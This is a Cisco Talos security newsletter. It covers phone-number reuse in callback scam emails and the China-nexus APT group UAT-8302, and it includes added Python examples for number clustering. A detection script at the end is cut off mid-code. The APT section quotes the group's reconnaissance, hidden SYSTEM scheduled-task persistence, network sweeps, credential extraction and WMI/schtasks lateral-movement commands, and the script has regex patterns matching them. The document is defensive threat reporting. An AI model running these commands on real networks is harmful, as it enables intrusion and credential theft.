Welcome to this week’s edition of the Threat Source newsletter.
Hey, you. Yeah, you! The person endlessly scrolling or typing away at their computer. Did you touch grass today? It's just an expression, but if nature’s your thing, that works just fine.
What I do mean is that due to the nature of the field, cybersecurity is incredibly intangible. You can’t reach out and touch your logs, or the packets traversing your network, or the concept of DNS exfiltration... and if you tried, you’d just feel the smooth surface of your computer screen. (What a boring texture.) Spending all our time in the abstract can create some serious mental fatigue.
My point is that there’s something powerful to be said about engaging with the physical world. When we engage in a tactile hobby, we give our brains a hard reset. By moving from the abstract to the physical, our brains get the time and space to process the complex problems we’ve been staring at, often leading to the “aha!” moment that never comes when you're trying to force it.
The other week, I was working in the Talos office with the Creative team. It was a quiet afternoon, people’s energy sapped by stomachs full of Mediterranean food. That was swiftly interrupted (in the best way) when Joe Marshall came over to our work area with his miniature painting kit, broke it open, and started teaching us how to drybrush 3D-printed figurines. Everyone immediately came alive. While I didn’t partake (I know, “Do as I say, not as I do”), it reminded me of how revitalized I feel when I get outside for a walk during lunch or spend 10 minutes knitting in silence between meetings. There’s nothing to focus on but the feel of the yarn between your fingers, the clacking of the needles, and the repetitive motions that result in a physical object you can wear and fish for compliments about.
Speaking of, do you think the vest I knit is cool? All compliments can be sent to me on LinkedIn, and I refuse to accept any negative comments. (Critiques are fine.)
Ahem... anyway. Go on a walk without your earbuds, listen to the wind through the leaves, ask a stranger to pet their dog, watch a pigeon bop its head around, and reach out to touch a cool-looking rock or the lichen on a tree. I hear you saying, "That’s some tree-hugging bullshit,” and counter you with, “Just humor me, okay? What’s the worst that could happen?”
If you’re more of an inside person, the goal might be to find a physical anchor for your technical interest. Maybe it’s building a mechanical keyboard from scratch — feeling the weight of the switches and hearing the click of the keycaps. Maybe it’s a complicated LEGO set. Even something as simple as making espresso or organizing your bookshelf can provide that sensory feedback your brain is craving.
If you're not currently facing a life-altering deadline, take 10 minutes and try it now. The rest of the newsletter isn’t going anywhere, I promise.
When you pay attention to the noises you hear, the colors you see, and the textures under your fingertips, you might come back to your laptop refreshed, focused, and ready to solve the next problem.
The one big thing
Cisco Talos has recently expanded our threat intelligence capabilities to track phone numbers as critical indicators of compromise (IOCs) in scam emails. Our latest research reveals that attackers heavily favor API-driven VoIP numbers to execute high-volume, cost-effective Telephone-Oriented Attack Delivery (TOAD) campaigns. To evade detection, these threat actors rotate through sequential blocks of numbers, use strategic cool-down periods, and recycle the exact same digits across completely unrelated lures and impersonated brands.
Why do I care?
Tracking ephemeral sender email addresses is a losing game, but phone numbers are the true operational anchors for these organized scam call centers. Because attackers reuse these numbers across multiple document types and brand impersonations, defenders who cluster this telephony infrastructure can expose the broader network of malicious activity. Understanding these reuse patterns gives defenders a much-needed edge in mapping out and dismantling these operations before users are manipulated into handing over sensitive data.
So now what?
Security teams should shift their focus toward clustering scam lures based on shared phone numbers and prioritize real-time reputation monitoring to flag high-risk infrastructure. Deploying an AI-powered email security solution like Cisco Secure Email Threat Defense can also help evaluate different portions of incoming emails to catch these targeted threats. A full list of indicators of compromise (IOCs) associated with these campaigns can be found in the blog.
Top security headlines of the week
DigiCert revokes certificates after support portal hack The attack, the company said in a detailed report, occurred on April 2, when a threat actor targeted DigiCert’s support team with a malicious payload delivered via a customer chat channel, disguised as a screenshot. (SecurityWeek)
Ubuntu services hit by outages after DDoS attack The DDoS-for-hire service in this case claims to power attacks in excess of 3.5 Tbps, which is about half of the bandwidth of a cyberattack that Cloudflare last year called the “largest DDoS attack ever recorded.” (TechCrunch)
Canvas maker Instructure reveals data breach Instructure said the actors accessed “certain identifying information of users” at affected institutions, including names, email addresses, student ID numbers, and user communications. (Tech Radar)
Exploitation of “Copy Fail” Linux vulnerability begins Threat actors are exploiting a recently disclosed Linux kernel vulnerability leading to root shell access, the US cybersecurity agency CISA warns. Dubbed Copy Fail, the security defect impacts all Linux distributions since 2017. (SecurityWeek)
Student hacked Taiwan high-speed rail to trigger emergency brakes According to local reports, the student halted four trains for 48 minutes by using software-defined radio (SDR) communications and handheld radios to transmit a high-priority “General Alarm” signal, triggering emergency braking procedures. (BleepingComputer)
Can’t get enough Talos?
Tales from the Frontlines In this briefing, we’ll share behind-the-scenes insights from the most critical and high-impact incidents we responded to in the last quarter. This isn't a report walkthrough; it's a look at what really happened, how we handled it, and what it means for your organization.
UAT-8302 and its box full of malware Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus APT group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.
CloudZ RAT potentially steals OTP messages using Pheno plugin Cisco Talos discovered an intrusion, active since at least January 2026, where an unknown attacker implanted a CloudZ remote access tool (RAT) and a previously undocumented plugin called “Pheno.”
Cisco Talos has recently started to collect and gather intelligence around phone numbers within emails as an additional indicator of compromise (IOC). In this blog, we discuss new insights into in-the-wild phone number reuse in scam emails.
According to Talos’ observations, the ease of API-driven provisioning makes a few VoIP providers the preferred tool for attackers, allowing for high-volume, cost-effective scam operations that are difficult to trace.
Attackers maintain operational continuity by rotating through sequential blocks of phone numbers and utilizing strategic cool-down periods, with a median phone number lifespan of 14 days, to effectively evade reputation-based security filters.
Threat actors try to maximize their reach by recycling the same phone numbers across diverse, seemingly unrelated lures - including varied subject lines and different attachment formats like HEIC and PDF - to impersonate multiple brands simultaneously.
Security researchers can expose the hidden infrastructure of organized scam call centers by shifting focus from ephemeral email addresses to phone numbers, using clustering techniques to connect disparate campaigns and strengthen overall defensive postures.
Telephone-oriented attack delivery (TOAD) continues to be a prevalent tactic in modern email threats. By shifting the communication channel from email to a real-time conversation, attackers manipulate victims into disclosing sensitive information or installing malicious software.
Cisco Talos has expanded its threat intelligence capabilities to include phone numbers as a critical IOC. Our analysis covers a wide spectrum of line types, including wireless (cellular), landline, and Voice over Internet Protocol (VoIP). While scammers leverage all three, VoIP numbers are particularly prevalent due to their ease of acquisition and the difficulty of tracing them back to their origin. In fact, six of the ten largest campaigns we detected between February 26 and March 31, 2026 relied on VoIP infrastructure.
To better understand how these numbers are weaponized, this blog first explains the technical structure of VoIP numbers and the role of service providers in this ecosystem. We then broaden the scope to analyze reuse patterns, lifespan, and campaign characteristics across all line types. By sharing these insights, Talos aims to strengthen our collective defensive posture against these evolving threats.
The structure of VoIP phone numbers
Most VoIP numbers follow the E.164 international public telecommunication numbering plan. This format ensures that every number is globally unique and can be routed correctly across the Public Switched Telephone Network (PSTN).
An E.164 number is limited to 15 digits and consists of:
International Prefix (+): Indicates the number is in international format
Country Code (CC): 1 to 3 digits (e.g., 1 for the US/Canada, 44 for the UK)
National Destination Code (NDC): The area code (or network code) that routes the call within the country
Subscriber Number (SN): The specific number assigned to the user or device
The above components are shown in the example phone number below:
Figure 1. The structure of an example VoIP phone number.
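To make the structure above concrete, here is an added example (not code from the Talos post) that pulls phone numbers out of lure text, normalizes the separators scammers use, and splits each result into country code, NDC and subscriber number. The lure text and numbers are constructed (they sit in ranges reserved for fiction), and both the small NDC_LENGTH table and the NANP default for numbers written without a "+" are simplifying assumptions; a production pipeline would lean on a numbering-plan library instead.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Country code -> length of the national destination code (area code) that
# follows it. This table is an assumption for the demo: E.164 itself does not
# fix NDC lengths, so real code should use a numbering-plan library.
NDC_LENGTH = {"1": 3, "44": 2}
MAX_E164_DIGITS = 15

# Candidate phone strings: a run of digits with the separators scammers use
# (spaces, dots, dashes, parentheses), optionally prefixed with '+'.
CANDIDATE = re.compile(r"\+?\d[\d\s().-]{7,}\d")


@dataclass(frozen=True)
class E164:
    cc: str   # country code (1 to 3 digits)
    ndc: str  # national destination code / area code
    sn: str   # subscriber number

    def __str__(self) -> str:
        return f"+{self.cc}{self.ndc}{self.sn}"


def normalize(raw: str) -> Optional[str]:
    """Reduce a phone string found in an email to its E.164 digits (no '+').

    Numbers written without '+' are assumed to be North American (NANP) when
    they have 10 digits, or 11 digits starting with 1. That default is a demo
    assumption; in practice it would be driven by the message's locale.
    """
    digits = re.sub(r"\D", "", raw)
    if raw.strip().startswith("+"):
        national = digits
    elif len(digits) == 10:
        national = "1" + digits
    elif len(digits) == 11 and digits.startswith("1"):
        national = digits
    else:
        return None
    if not 8 <= len(national) <= MAX_E164_DIGITS:
        return None
    return national


def parse_e164(digits: str) -> Optional[E164]:
    """Split E.164 digits into CC / NDC / SN using the NDC_LENGTH table."""
    for cc_len in (1, 2, 3):  # country codes are 1 to 3 digits long
        cc = digits[:cc_len]
        if cc in NDC_LENGTH:
            ndc_len = NDC_LENGTH[cc]
            ndc = digits[cc_len:cc_len + ndc_len]
            sn = digits[cc_len + ndc_len:]
            if ndc and sn:
                return E164(cc, ndc, sn)
    return None


def extract_numbers(text: str) -> list[E164]:
    """Return the distinct, parseable phone numbers in text, in order found."""
    seen: dict[str, E164] = {}
    for m in CANDIDATE.finditer(text):
        digits = normalize(m.group())
        if digits is None:
            continue
        parsed = parse_e164(digits)
        if parsed is not None and str(parsed) not in seen:
            seen[str(parsed)] = parsed
    return list(seen.values())


# Constructed lure text (not a real email). The numbers are in ranges reserved
# for fiction: NANP 555-01xx and the UK 020 7946 0xxx block.
SAMPLE_LURE = """
Your Norton subscription renews today at $349.99. Questions? Call +1 (555) 010-0147.
To cancel, dial 1.555.010.0148 or 555-010-0149 within 24 hours.
Customers outside the US: +44 20 7946 0958.
"""

if __name__ == "__main__":
    for number in extract_numbers(SAMPLE_LURE):
        print(number, "cc=", number.cc, "ndc=", number.ndc, "sn=", number.sn)
```

The canonical "+CC NDC SN" string is the key worth storing: the same call-center number shows up as "+1 (555) 010-0147" in one subject line and "1.555.010.0147" in a PDF, and only the normalized form lets those two emails be clustered together.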
The VoIP ecosystem
Voice over Internet Protocol (VoIP) has become the primary medium for scam campaigns due to its cost effectiveness, ease of deployment, and API-driven automation. Within this ecosystem, we identify two primary operational models: wholesalers and retailers. VoIP wholesalers (e.g., Virtue, Twilio, and Bandwidth) operate in a business-to-business (B2B) capacity, sitting between Tier 1 carriers (e.g., AT&T, Verizon) and smaller service providers, selling high volumes of numbers in bulk. Conversely, VoIP retailers (e.g., RingCentral) sell finished business calling and collaboration solutions directly to organizations and end users.
VoIP providers are further categorized into communications platform as a service (CPaaS) and unified communications as a service (UCaaS). CPaaS providers offer programmable APIs that allow developers to integrate voice and messaging directly into applications. Because these platforms are designed for automation and high-volume traffic, they are frequently exploited by threat actors for rapid, API-driven number provisioning. In contrast, UCaaS providers offer comprehensive, end-user-facing communication suites. UCaaS platforms are typically designed for legitimate enterprise collaboration, and that makes them less attractive for scam email campaigns. Talos has found Sinch (primarily a leader in CPaaS) as the most commonly abused VoIP provider, and Verizon and NUSO as the least abused providers in the studied time window.
Figure 2. The distribution of phone line types in scam emails.
While VoIP line types dominate the scam landscape (see Figure 2), Talos has observed that threat actors utilize wireless (cellular) and landline numbers as well. Cellular numbers are harder to provision at scale, as they typically require physical SIM cards and stricter customer verification, making them more expensive and less disposable than VoIP numbers. Nevertheless, they are still widely adopted by scammers. Figure 3 shows the distribution of wireless carriers that are used by scammers in the studied time window. Landline numbers, on the other hand, are used to project a sense of local presence or established business legitimacy. By using a landline with a specific local area code, scammers can effectively impersonate local businesses (e.g., banks, utility companies, or government offices).
Figure 3. The distribution of carrier names in wireless phone numbers found in scam emails.
Phone number reuse and lifespan in scam campaigns
In this section, we provide insights into the lifecycle of phone numbers used in scam emails, examining how often they are reused, their typical lifespan, and how they appear across seemingly unrelated lures. Our analysis focuses on scam campaigns impersonating popular brands, including PayPal, Geek Squad (Best Buy), McAfee, and Norton LifeLock.
Phone number reuse patterns
Talos identified 1,652 unique phone numbers across these campaigns during the studied time window (February 26 to March 31). Of these, 57 numbers (approximately 3.4%) were reused across multiple consecutive days. The longest period of reuse observed for a single phone number was four consecutive days.
As discussed in a previous blog post, phone numbers are reused for several strategic reasons. First, intelligence regarding phone numbers is often distributed more slowly than that of URLs or file hashes; many numbers remain under the radar of third-party reputation services for several days. Second, reuse offers logistical advantages for scam call centers, allowing them to maintain a consistent brand presence for multi-stage social engineering, callback scheduling, and persistent victim engagement. Finally, reuse minimizes operational costs, particularly for paid VoIP services. While we observed some phone numbers reused for up to four consecutive days, the most common reuse period was two consecutive days.
Lifespan analysis and cool-down periods
Scammers do not always reuse phone numbers on consecutive days. Often, they implement a cool-down period — pausing the use of a number for a few days to evade detection — before reintroducing it into a campaign.
Our investigation into the lifespan of these numbers revealed that 108 phone numbers (~6.5%) remained active for more than one day. As shown in Figure 4, most phone numbers have a lifespan of two to six days, though a handful remained active for nearly a month. During the study window, the median lifespan was approximately 14 days. Notably, infrastructure longevity often correlates with the impersonated brand; as illustrated in Figure 5, PayPal-themed scam campaigns utilized significantly more persistent phone numbers than those impersonating Norton LifeLock.
Figure 4. The distribution of phone number lifespans (in days) in scam emails impersonating the above four brands.
Figure 5. The lifespan of phone numbers in scam emails for the top two impersonated brands.
Phone numbers across unrelated lures
A scam or phishing lure is typically a combination of a business context, a psychological trigger, a call-to-action, and an impersonated brand (see Table 1 for a few examples). These lures appear across various email layers, including subject lines, body content, and attachments.
Claimed business context: subscription renewal; invoice or billing statement; account security alert; order confirmation/shipping issue; technical support case; refund or overpayment notice; service cancelation confirmation; financial transaction verification
Psychological trigger: urgency; fear/loss aversion; confusion; relief opportunity; curiosity
Call-to-action: call a phone number; click a link; reply with personal details; download/open attachment; provide payment/banking information
Impersonated brand: PayPal; Geek Squad (Best Buy); McAfee; Norton LifeLock
Table 1. Examples of lures that most commonly appear in scam or phishing emails.
We observed phone numbers being recycled across diverse, seemingly unrelated lures:
Using the same phone number across multiple lures in the subject line: In one campaign, a single phone number appeared across multiple business contexts, such as "order confirmation" and "financial transaction verification." Figure 6 demonstrates how these subject lines differ, despite the emails containing the same phone number and impersonating the same brand.
Figure 6. Four scam emails with completely different subject lines that contain the same phone number.
Using the same phone number across multiple document-based lures: In a second campaign, a single phone number was embedded in PDF attachments used for both “subscription renewal” and “financial transaction verification.” Interestingly, this campaign utilized two different brands, PayPal and Norton LifeLock, to redirect recipients to the same call center, leveraging urgency as a psychological trigger.
Figure 7. Two scam emails with different body contents that contain the same phone number while impersonating different brands.
Using the same phone number across multiple attachment file formats: In a third campaign, a single phone number was embedded in two different attachment formats: HEIC and JPEG. The use of HEIC (High Efficiency Image Container) — a format often used for iPhone/iPad photos — demonstrates the attackers' efforts to bypass traditional file-based detection while maintaining high image quality. Talos has observed campaigns utilizing even more attachment types, confirming that threat actors frequently distribute a single phone number across multiple attack vectors to maximize their reach.
Figure 8. Two scam emails with different attachment file types that contain the same phone number while impersonating the same brand.
Phone block-level clustering
In the context of scam emails and related smishing or callback scams, attackers utilize specific VoIP grouping and clustering techniques to bypass security filters, appear legitimate, and maintain high-volume operations. One of the most common tactics is sequential number grouping. Scammers often obtain large ranges of sequential phone numbers by purchasing Direct Inward Dialing (DID) blocks. Consequently, if a specific number is flagged as spam and blocked by a carrier, the attackers simply rotate to the next number in the block.
The figure below shows how a block of numbers — differing only in the last four digits — is used in various scam emails impersonating PayPal between March 3 and March 6, 2026. It is also clear that certain numbers are used in larger campaigns than others; for instance, “+1 804[-]713[-]4598” was used in 117 scam emails in a single day.
Figure 9. Example of sequential phone numbers used in scam emails impersonating one specific brand.
In large-scale scam campaigns, phone numbers within a single sequential block are reused across multiple brand lures. The figure below shows how a range of numbers in a sequential block is deployed across three different brand lures. As with the previous case, some phone numbers are utilized in significantly larger campaign volumes than others.
Figure 10. Example of sequential phone numbers used in scam emails impersonating multiple brands.
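The two patterns described above, a single number bridging unrelated lures and a sequential DID block spread across brands, are exactly what a clustering step has to surface. The following is an added example, not Talos tooling, run over constructed email records whose numbers are already in E.164 form: it groups emails by shared number, flags numbers that appear under more than one business context, brand or attachment layer, and then finds runs of consecutive numbers that differ only in the last four digits and reports which brands each run serves.

```python
from collections import defaultdict

# Constructed email records (not Talos data). Each carries the E.164 number
# already extracted from the subject, body or attachment, plus the lure it
# came from. Numbers are fictional (NANP 555-01xx range).
EMAILS = [
    {"id": 1, "brand": "PayPal", "context": "order confirmation", "layer": "subject", "phone": "+15550100147"},
    {"id": 2, "brand": "PayPal", "context": "financial transaction verification", "layer": "subject", "phone": "+15550100147"},
    {"id": 3, "brand": "Norton LifeLock", "context": "subscription renewal", "layer": "pdf", "phone": "+15550100148"},
    {"id": 4, "brand": "PayPal", "context": "financial transaction verification", "layer": "pdf", "phone": "+15550100148"},
    {"id": 5, "brand": "McAfee", "context": "subscription renewal", "layer": "heic", "phone": "+15550100151"},
    {"id": 6, "brand": "McAfee", "context": "subscription renewal", "layer": "jpeg", "phone": "+15550100151"},
    {"id": 7, "brand": "Geek Squad (Best Buy)", "context": "invoice", "layer": "body", "phone": "+15550100162"},
    {"id": 8, "brand": "Geek Squad (Best Buy)", "context": "invoice", "layer": "body", "phone": "+15550100163"},
    {"id": 9, "brand": "PayPal", "context": "subscription renewal", "layer": "body", "phone": "+15550100164"},
    {"id": 10, "brand": "Norton LifeLock", "context": "refund notice", "layer": "body", "phone": "+15550100165"},
]


def cluster_by_phone(emails):
    """Group emails by the phone number they carry; the number is the anchor."""
    clusters = defaultdict(lambda: {"emails": [], "brands": set(), "contexts": set(), "layers": set()})
    for e in emails:
        c = clusters[e["phone"]]
        c["emails"].append(e["id"])
        c["brands"].add(e["brand"])
        c["contexts"].add(e["context"])
        c["layers"].add(e["layer"])
    return dict(clusters)


def cross_lure_numbers(clusters):
    """Numbers that bridge lures: more than one context, brand or attachment layer."""
    return {
        phone: c for phone, c in clusters.items()
        if len(c["contexts"]) > 1 or len(c["brands"]) > 1 or len(c["layers"]) > 1
    }


def sequential_runs(phones, min_len=2):
    """Find runs of consecutive numbers that share everything but the last four digits.

    Returns {prefix: [[number, ...], ...]} with one inner list per run of at
    least min_len consecutive numbers, which is the DID-block signature.
    """
    by_prefix = defaultdict(list)
    for p in set(phones):
        by_prefix[p[:-4]].append(int(p[-4:]))
    runs = {}
    for prefix, tails in by_prefix.items():
        tails.sort()
        found, run = [], [tails[0]]
        for t in tails[1:]:
            if t == run[-1] + 1:
                run.append(t)
            else:
                if len(run) >= min_len:
                    found.append(run)
                run = [t]
        if len(run) >= min_len:
            found.append(run)
        if found:
            runs[prefix] = [[f"{prefix}{t:04d}" for t in r] for r in found]
    return runs


def run_brands(run, clusters):
    """Union of brands impersonated across one sequential block."""
    return set().union(*(clusters[p]["brands"] for p in run))


if __name__ == "__main__":
    clusters = cluster_by_phone(EMAILS)
    for phone, c in cross_lure_numbers(clusters).items():
        print(phone, "bridges", sorted(c["contexts"]), sorted(c["brands"]), sorted(c["layers"]))
    for prefix, runs in sequential_runs(clusters).items():
        for run in runs:
            print(prefix, "block", run[0][-4:], "..", run[-1][-4:], "brands:", sorted(run_brands(run, clusters)))
```

The prefix-and-run logic is deliberately naive (numbers differing only in the last four digits, as in Figure 9); a provider-aware version would group on the NPA-NXX actually allocated to the VoIP carrier, which is the information a real-time reputation feed can attach to each number.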
Conclusion and protection
When tracking scam campaigns, it is essential to look beyond individual sender email addresses, which are often ephemeral. Instead, it is more strategic to focus on phone numbers, which serve as the true anchors of the operation. By clustering scam lures based on shared phone numbers, security researchers can effectively map connections between seemingly unrelated campaigns, ultimately exposing the infrastructure of organized criminal call centers.
Service providers and security teams should prioritize the implementation of real-time reputation monitoring for different communication channels to proactively mitigate these threats. For example, establishing centralized databases that track and flag high-risk phone numbers across multiple platforms allows for rapid cross-campaign correlation. Collaboration between telecommunications and VoIP providers is also vital, as sharing threat intelligence regarding malicious telephony infrastructure enables an industry-wide defense against the persistent threat of social engineering and fraud.
Cisco Secure Email Threat Defense
Protecting against these sophisticated and devious threats requires a comprehensive email security solution that harnesses AI-powered detections. Cisco Secure Email Threat Defense utilizes unique deep and machine learning models, including Natural Language Processing, in its advanced threat detection systems that leverage multiple engines. These simultaneously evaluate different portions of an incoming email to uncover known, emerging, and targeted threats.
Secure Email Threat Defense identifies malicious techniques used in attacks targeting your organization, derives unparalleled context for specific business risks, provides searchable threat telemetry, and categorizes threats to understand which parts of your organization are most vulnerable to attack. You can sign up for a free trial of Email Threat Defense today.
Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.
After successful compromises, UAT-8302 deploys multiple custom-made malware families that have previously been used by other known China-nexus threat actors.
Talos discovered a .NET-based backdoor we track as “NetDraft” that is a C#-based variant of the FinalDraft/SquidDoor malware family developed and operated by Jewelbug/REF7707/CL-STA-0049/LongNosedGoblin, a cluster of China-nexus APT actors.
Furthermore, UAT-8302 also uses an updated version of the CloudSorcerer backdoor, a malware family used in attacks against Russian government entities in 2024.
UAT-8302 also used VSHELL and its SNOWLIGHT stager in their operations, along with a new Rust-based stager that we track as SNOWRUST.
Talos assesses with high confidence that UAT-8302 is a China-nexus advanced persistent threat (APT) group tasked primarily with obtaining and maintaining long-term access to government and related entities around the world.
Post-compromise activity consisted of information collection, credential extraction, and proliferation using open-source tooling such as Impacket, proxying tools, and custom-built malware.
Malware deployed by UAT-8302 connects it to several previously publicly disclosed threat clusters, indicating a close operating relationship between them at the very least. Overall, the various malicious artifacts deployed by UAT-8302 indicate that the group has access to tools used by other sophisticated APT actors, all of which have been assessed as China-nexus or Chinese-speaking by various third-party industry reports.
For instance, NetDraft, a .NET-based malware family deployed by UAT-8302 in South America, was also disclosed by ESET as NosyDoor, attributed to a China-nexus APT they track as LongNosedGoblin. ESET assesses that LongNosedGoblin used NosyDoor/NetDraft and other custom-made malware to target government organizations in Southeast Asia and Japan. Furthermore, as per Solar’s reporting, NetDraft was also deployed against Russian IT organizations in 2024 by Erudite Mogwai (LuckyStrike Agent).
NetDraft is likely a .NET-ported variant of the FinalDraft/SquidDoor malware family developed and operated exclusively by Jewelbug/REF7707/CL-STA-0049 — also another cluster of China-nexus APT actors.
Another malware family deployed by UAT-8302 is CloudSorcerer (version 3). Kaspersky disclosed that CloudSorcerer was used in attacks directed against Russian government entities in 2024.
Furthermore, two other malware families, SNAPPYBEE/DeedRAT and ZingDoor, were deployed by UAT-8302 in conjunction with each other, a tactic also highlighted by Trend Micro in 2024.
Talos’ analysis also connects more custom-made tooling that UAT-8302 used to other China-nexus or Chinese-speaking APTs:
Draculoader: A generic shellcode loader deployed by UAT-8302, also used by the Earth Estries and Earth Naga APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere.
SNOWLIGHT: A generic stager for the VSHELL malware family, used by UAT-8302. Also used by UAT-6382, who exploited a Cityworks zero-day (CVE-2025-0994) to deploy VSHELL. SNOWLIGHT has also been seen in intrusions attributed to other China-nexus APT clusters, such as UNC5174 and UNC6586.
The various connections between UAT-8302 and other China-nexus or Chinese-speaking threat actors can be visualized as:
Figure 1. UAT-8302's interconnections.
Initial compromise and reconnaissance
UAT-8302's tooling overlaps with various APT groups that have been known to exploit both zero-day and n-day exploits to obtain initial access. We assess that UAT-8302 follows the same paradigm of obtaining initial access to its victims.
Once initial access is obtained, UAT-8302 conducts preliminary reconnaissance using red-teaming tools such as Impacket. Other reconnaissance commands observed include:
ipconfig /all
certutil -user -store My
certutil -user -store CA
certutil -user -store Root
whoami
nslookup www[.]google[.]com
net use
cmd.exe /c net view /domain
cmd.exe /c systeminfo
cmd.exe /c net time /domain
cmd.exe /c nslookup -type=SRV _ldap._tcp
net group <name> /domain
One of UAT-8302's primary goals is to proliferate within the compromised network, so the actor conducts extensive reconnaissance on every endpoint it can access. This extended recon is usually scripted using a custom-made PowerShell script such as “whatpc.ps1”.
The script may be persisted to collect system information via a scheduled task:
cmd.exe /c schtasks /create /tn 'ReconLiteDebug' /tr 'powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File c:\windows\temp\whatpc.ps1' /sc ONCE /st 08:25 /ru SYSTEM /f
cmd.exe /c schtasks /create /tn 'RunWhatPC' /tr 'c:\windows\temp\run.bat' /sc ONCE /st 23:28 /ru SYSTEM /f
This script executes the following commands on the systems to identify them:
whoami
whoami.exe /groups
whoami.exe /priv
net.exe user
net.exe localgroup
net.exe localgroup administrators
ipconfig.exe /all
ARP.EXE -a
ROUTE.EXE print
NETSTAT.EXE -ano
cmd.exe /c net share
cmd.exe /c wmic startup get caption,command 2>&1
nltest.exe /dclist:<domain>
net.exe user /domain
net.exe group /domain
net.exe group Domain Admins /domain
nltest.exe /domain_trusts
UAT-8302 also performs ping sweeps of the network to discover more endpoints to proliferate into:
C:/Windows/Temp/ping_scan.bat
C:/Windows/Temp/run_scan.bat
C:/Windows/Temp/nbtscan.exe
cmd.exe /Q /c (for /l %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find TTL= && echo 192.168.1.%i is alive) > C:\Windows\Temp\alive_hosts.txt
UAT-8302 also discovers SMB shares in the network to find reachable remote shares:
cmd.exe /Q /c (for /l %i in (1,1,254) do @net use \\192.168.1.%i\IPC$ >nul 2>&1 && echo 192.168.1.%i - Port 445 is open || echo 192.168.1.%i - Port 445 is closed) > C:\Windows\Temp\portscan.txt
Scanning tools
UAT-8302 may also download and run “gogo,” an open-source, Go-based automated network scanning engine whose documentation is written in Simplified Chinese.
UAT-8302 collects a variety of information about the environment that they are operating within including Active Directory (AD) information and credentials using open-sourced tooling such as:
adconnectdump.py
A Python-based tool for extracting credentials from Microsoft Entra Connect (formerly Azure AD Connect):
python.exe adconnectdump.py
Manual extraction
UAT-8302 may also directly query AD user and computer objects via PowerShell to obtain information from them.
Specific AD users of interest may also be queried using system tools such as dsmod and dsquery.
Log collection
UAT-8302 also collects event log information, and the logs themselves, from multiple endpoints. Logs are an excellent source for understanding the security configurations and policies applied within a target’s environment.
UAT-8302 also uses a tool written in Simplified Chinese called “SharpGetUserLoginIPRP” — derived from another Chinese-language repository — which is used to extract login information from a domain controller:
C:\ProgramData\S.exe user:pass@IP -day
Proliferation through the network
UAT-8302 proliferates across various endpoints by using a combination of either Impacket- or WMI-based remote process creation:
cmd.exe /C wmic /node:IP process call create cmd.exe /c c:\programdata\e1.bat
cmd.exe /C schtasks /S IP /U username /P passwd /create /tn 'Runbat' /tr 'c:\windows\temp\run.bat' /sc ONCE /st 5:12 /ru SYSTEM /f
These BAT files are meant to execute the accompanying malware on the target systems.
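The discovery, sweep and lateral-movement command lines quoted in this section and in the reconnaissance section above make a useful detection corpus. The following is an added example (not Talos code) that runs four rules over constructed process-creation events modelled on those command lines: a burst of distinct discovery commands from one host inside a short window, a scheduled task created as SYSTEM that points into a staging directory, a cmd for-loop used as a ping or SMB sweep, and remote process creation via wmic /node or schtasks /S. The burst threshold, window size and staging-directory list are tuning assumptions, and the second host's events are constructed benign activity to show the rules stay quiet.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events (timestamp, host, user, command line),
# modelled on the command lines listed in this report. Not real telemetry.
EVENTS = [
    ("2026-03-03T08:20:01Z", "WS01", "CORP\\jdoe", "whoami.exe /priv"),
    ("2026-03-03T08:20:05Z", "WS01", "CORP\\jdoe", 'net.exe group "Domain Admins" /domain'),
    ("2026-03-03T08:20:09Z", "WS01", "CORP\\jdoe", "nltest.exe /dclist:corp.example"),
    ("2026-03-03T08:20:15Z", "WS01", "CORP\\jdoe", "ipconfig.exe /all"),
    ("2026-03-03T08:20:21Z", "WS01", "CORP\\jdoe", "NETSTAT.EXE -ano"),
    ("2026-03-03T08:20:30Z", "WS01", "CORP\\jdoe", "nltest.exe /domain_trusts"),
    ("2026-03-03T08:25:00Z", "WS01", "NT AUTHORITY\\SYSTEM",
     "cmd.exe /c schtasks /create /tn 'ReconLiteDebug' /tr 'powershell -ExecutionPolicy Bypass "
     "-WindowStyle Hidden -File c:\\windows\\temp\\whatpc.ps1' /sc ONCE /st 08:25 /ru SYSTEM /f"),
    ("2026-03-03T08:31:12Z", "WS01", "CORP\\jdoe",
     "cmd.exe /Q /c (for /l %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find TTL= "
     "&& echo 192.168.1.%i is alive) > C:\\Windows\\Temp\\alive_hosts.txt"),
    ("2026-03-03T08:40:44Z", "WS01", "CORP\\jdoe",
     "cmd.exe /C wmic /node:192.168.1.23 process call create cmd.exe /c c:\\programdata\\e1.bat"),
    # Second host: one discovery command and a normal backup task (constructed benign noise).
    ("2026-03-03T09:02:10Z", "WS02", "CORP\\asmith", "ipconfig.exe /all"),
    ("2026-03-03T09:05:00Z", "WS02", "CORP\\asmith",
     "schtasks /create /tn 'NightlyBackup' /tr 'C:\\Program Files\\Backup\\backup.exe' /sc DAILY /st 02:00 /f"),
]

# Discovery commands from the whatpc.ps1 list; one category per technique so
# repeats of the same command do not inflate the burst count.
RECON_PATTERNS = {name: re.compile(p, re.I) for name, p in {
    "whoami": r"\bwhoami(\.exe)?\b",
    "domain_groups": r"\bnet(\.exe)?\s+group\b.*/domain",
    "domain_users": r"\bnet(\.exe)?\s+user\b.*/domain",
    "dc_list": r"\bnltest(\.exe)?\s+/dclist",
    "trusts": r"\bnltest(\.exe)?\s+/domain_trusts",
    "ipconfig": r"\bipconfig(\.exe)?\s+/all",
    "netstat": r"\bnetstat(\.exe)?\s+-ano",
    "arp": r"\barp(\.exe)?\s+-a\b",
    "route": r"\broute(\.exe)?\s+print",
    "shares": r"\bnet(\.exe)?\s+share\b",
    "startup": r"\bwmic\s+startup\b",
    "certstore": r"\bcertutil\s+-user\s+-store\b",
    "systeminfo": r"\bsysteminfo\b",
}.items()}
BURST_WINDOW = timedelta(minutes=10)   # tuning assumption
BURST_THRESHOLD = 5                    # distinct categories per host per window

STAGING_DIR = re.compile(r"\\(windows\\temp|programdata|users\\public)\\", re.I)
SCHTASKS_CREATE = re.compile(r"\bschtasks\b.*\s/create\b", re.I)
RUN_AS_SYSTEM = re.compile(r"\s/ru\s+system\b", re.I)
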